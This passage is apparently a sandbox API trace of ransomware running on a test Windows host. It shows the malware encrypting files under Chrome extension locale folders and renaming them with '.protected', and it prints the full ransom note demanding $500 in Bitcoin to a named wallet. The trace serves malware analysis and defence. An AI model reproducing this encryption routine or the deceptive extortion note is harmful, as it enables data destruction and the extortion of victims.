HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\..") returned 146 [0079.772] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.772] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.772] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.772] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.772] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.772] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.772] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.772] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.772] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json") returned 157 [0079.772] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.772] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.772] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.772] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.772] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json") returned 157 [0079.772] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.772] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json") returned 157 [0079.772] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.772] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json") returned 157 [0079.772] StrStrW 
(lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.773] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.773] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.773] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.773] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.773] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.774] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.774] CloseHandle (hObject=0x168) returned 1 [0079.774] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.protected") returned 167 [0079.774] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.protected")) returned 1 [0079.774] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.774] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.774] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\RESTORE_FILES.txt") returned 161 [0079.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.775] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.775] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.775] lstrlenA (lpString="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") returned 684 [0079.775] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0079.775] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.775] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.776] CloseHandle (hObject=0x164) returned 1 [0079.776] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.776] lstrcmpiW (lpString1="hu", lpString2="Windows") returned -1 [0079.776] lstrcmpiW (lpString1="hu", lpString2="Program Files") returned -1 [0079.776] lstrcmpiW (lpString1="hu", lpString2="Program Files (x86)") returned -1 [0079.776] lstrcmpiW (lpString1="hu", lpString2="$Recycle.bin") returned 1 [0079.776] lstrcmpiW (lpString1="hu", lpString2="System Volume Information") returned -1 [0079.776] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu") returned 143 [0079.776] lstrcmpW (lpString1="hu", lpString2=".") returned 1 [0079.776] lstrcmpW (lpString1="hu", lpString2="..") returned 1 [0079.776] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\*") returned 145 [0079.776] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.777] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0079.777] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.777] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.777] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.777] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.777] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\.") returned 145 [0079.777] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.777] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.777] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.777] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.777] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.777] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.777] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.777] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\..") returned 146 [0079.777] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.777] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.777] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.777] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.777] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.777] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0079.777] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.777] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.777] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json") returned 157 [0079.777] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.777] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.777] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.777] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.777] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json") returned 157 [0079.777] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.778] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json") returned 157 [0079.778] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.778] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json") returned 157 [0079.778] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.778] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.778] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.778] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.778] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.779] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.779] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.779] CloseHandle (hObject=0x168) returned 1 [0079.779] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.protected") returned 167 [0079.779] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.protected")) returned 1 [0079.779] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.779] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.779] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\RESTORE_FILES.txt") returned 161 [0079.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.780] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.780] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.780] lstrlenA (lpString="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") returned 684 [0079.780] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.780] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.780] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.781] CloseHandle (hObject=0x164) returned 1 [0079.781] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.781] lstrcmpiW (lpString1="id", lpString2="Windows") returned -1 [0079.781] lstrcmpiW (lpString1="id", lpString2="Program Files") returned -1 [0079.781] lstrcmpiW (lpString1="id", lpString2="Program Files (x86)") returned -1 [0079.781] lstrcmpiW (lpString1="id", lpString2="$Recycle.bin") returned 1 [0079.781] lstrcmpiW (lpString1="id", lpString2="System Volume Information") returned -1 [0079.781] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id") returned 143 [0079.781] lstrcmpW (lpString1="id", lpString2=".") returned 1 [0079.781] lstrcmpW (lpString1="id", lpString2="..") returned 1 [0079.781] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\*") returned 145 [0079.781] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.781] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.781] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.781] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.781] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.781] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.781] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\.") returned 145 [0079.781] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.781] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.781] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.781] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.781] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.781] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.781] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.781] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\..") returned 146 [0079.781] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.781] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.781] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.781] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.781] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.781] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.781] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.781] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.781] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json") returned 157 [0079.782] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.782] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.782] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.782] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.782] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json") returned 157 [0079.782] StrStrW 